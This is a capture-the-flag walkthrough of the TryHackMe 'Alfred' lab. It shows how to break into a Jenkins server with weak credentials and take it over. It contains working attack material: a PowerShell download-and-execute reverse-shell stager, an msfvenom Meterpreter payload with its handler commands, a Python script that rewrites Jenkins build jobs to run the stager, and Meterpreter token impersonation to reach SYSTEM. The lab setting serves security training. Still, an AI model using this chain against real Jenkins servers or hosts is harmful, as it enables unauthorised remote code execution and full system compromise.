Link: https://tryhackme.com/room/alfred
Recon
Run nmap [Target Machine IP] (add -sV if you also want service versions).

There are 3 open TCP ports (TCP connect scan).
Open http://[Target Machine IP]:80 and http://[Target Machine IP]:8080 in a browser.
[Target Machine IP]:8080 is the Jenkins login page. Jenkins does not ship with a fixed default password (it generates a random one on first install), so try common weak credentials: admin:admin works here.
Once you log in you will see a build job. The job configuration shows it runs a Windows batch command, so this is a Windows machine. Configure the job and replace the build command with the reverse shell stager (the download port 8888 and shell port 4444 match the web server and listener started below):
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:8888/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port 4444

Invoke-PowerShellTcp.ps1 is part of the Nishang toolkit. Download it to the attacker machine and host it with a Python web server on port 8888, run from the directory that holds the script (python3 -m http.server 8888).
Run nc -lvnp 4444
on the attacker machine. Then trigger a build of this job.

We will get a shell from the target machine (it runs as the Jenkins service user). Look for user.txt (usually in a user's Documents or Desktop folder).
The text contains:

Upgrade shell
Generate a payload
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[ATTACKER IP] LPORT=3333 -f exe -o shell.exe
Put shell.exe in the directory served by the Python web server on port 8888 so the target can fetch it.
Open the msfconsole in attacker machine and run these commands (line by line):
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [ATTACKER IP]
set LPORT 3333
run
Download shell.exe onto the target machine by putting this command into the Jenkins build step and building again (it saves the file into the job's workspace, the working directory of the build):
powershell "(New-Object System.Net.WebClient).DownloadFile('http://[ATTACKER IP]:8888/shell.exe','shell.exe')"
In the shell you already have, run Start-Process shell.exe from the directory the file was saved to
to upgrade the shell.

If this is successful, you will see a new Meterpreter session open in msfconsole.
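Both Jenkins steps above (putting the Nishang stager into the build command, and later fetching shell.exe the same way) can be scripted against the Jenkins REST API. The script below is an added example written for this page; it is not code from the walkthrough, Nishang or Metasploit. It authenticates with the admin:admin credentials, fetches a CSRF crumb, rewrites the job's Windows batch build step and triggers the build. The Jenkins URL, attacker IP and job name are assumptions (read the real ones off the dashboard), and the config.xml sample is constructed so the XML rewriting can be checked offline.

```python
"""Jenkins build-step abuse helper (added example, not from the walkthrough)."""
import base64
import json
import urllib.request
import xml.etree.ElementTree as ET
from http.cookiejar import CookieJar
from typing import Optional

# All of these are assumptions: take the real values from the Jenkins dashboard.
JENKINS = "http://10.10.10.10:8080"
USER, PASSWORD = "admin", "admin"          # weak credentials that work on this box
JOB = "project"                            # name of the existing freestyle job
ATTACKER_IP, HTTP_PORT, SHELL_PORT = "10.9.9.9", 8888, 4444

BATCH_STEP = "hudson.tasks.BatchFile"      # the "Execute Windows batch command" step

# Constructed minimal freestyle-job config.xml with one batch step (offline sample).
SAMPLE_CONFIG = """<project>
  <builders>
    <hudson.tasks.BatchFile>
      <command>echo "Building..."</command>
    </hudson.tasks.BatchFile>
  </builders>
</project>"""


def stager(attacker_ip: str, http_port: int, shell_port: int) -> str:
    """The Nishang Invoke-PowerShellTcp one-liner with the attacker ports filled in."""
    url = f"http://{attacker_ip}:{http_port}/Invoke-PowerShellTcp.ps1"
    return (f"powershell iex (New-Object Net.WebClient).DownloadString('{url}');"
            f"Invoke-PowerShellTcp -Reverse -IPAddress {attacker_ip} -Port {shell_port}")


def inject_command(config_xml: str, command: str) -> str:
    """Return config.xml with the command of every Windows batch step replaced.

    Raises ValueError when the job has no batch step (e.g. a pipeline job)
    instead of inventing one with guessed settings.
    """
    root = ET.fromstring(config_xml)
    builders = root.find("builders")
    steps = [] if builders is None else [b for b in builders if b.tag == BATCH_STEP]
    if not steps:
        raise ValueError("job has no Windows batch build step")
    for step in steps:
        cmd = step.find("command")
        if cmd is None:
            cmd = ET.SubElement(step, "command")
        cmd.text = command
    return ET.tostring(root, encoding="unicode")


def _opener() -> urllib.request.OpenerDirector:
    """Basic-auth opener with a cookie jar: the CSRF crumb is tied to the session."""
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(CookieJar()))
    token = base64.b64encode(f"{USER}:{PASSWORD}".encode()).decode()
    opener.addheaders = [("Authorization", f"Basic {token}")]
    return opener


def _call(opener, path: str, method: str = "GET", body: Optional[bytes] = None,
          headers: Optional[dict] = None) -> bytes:
    req = urllib.request.Request(JENKINS + path, data=body, method=method)
    for name, value in (headers or {}).items():
        req.add_header(name, value)
    with opener.open(req, timeout=15) as resp:
        return resp.read()


def run_build(command: str) -> None:
    """Rewrite JOB's batch step to `command` and trigger a build (needs network)."""
    opener = _opener()
    crumb = json.loads(_call(opener, "/crumbIssuer/api/json"))
    csrf = {crumb["crumbRequestField"]: crumb["crumb"]}
    current = _call(opener, f"/job/{JOB}/config.xml").decode()
    patched = inject_command(current, command)
    _call(opener, f"/job/{JOB}/config.xml", "POST", patched.encode(),
          {**csrf, "Content-Type": "application/xml"})
    _call(opener, f"/job/{JOB}/build", "POST", b"", csrf)   # 201 Created on success


if __name__ == "__main__":
    # Start `python3 -m http.server 8888` and `nc -lvnp 4444` before running this.
    run_build(stager(ATTACKER_IP, HTTP_PORT, SHELL_PORT))
```

Call run_build with the stager for the first shell, and again with the DownloadFile one-liner above to pull shell.exe onto the target. The script leaves the job's other settings untouched and refuses to touch a job that has no batch step, which is worth keeping: overwriting a job you have not looked at is how you lose the foothold.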

Privilege Escalation with Access Token
Check the user's privileges with whoami /priv. Look for SeImpersonatePrivilege (and SeDebugPrivilege); that is what makes the token impersonation below possible.

In the Meterpreter session, run load incognito and then list_tokens -g to list the group tokens available to this process.


Run impersonate_token "BUILTIN\\Administrators" to impersonate the Administrators token (the backslash has to be doubled because Meterpreter treats a single one as an escape).
Windows decides what a process may do from its primary token, not from an impersonated token, so the session may still lack Administrator permissions. Run ps, find the PID of a process already running as NT AUTHORITY\SYSTEM (services.exe is a good choice) and migrate into it:
migrate PID-OF-PROCESS

Start a shell with shell and confirm with whoami that you are now SYSTEM.
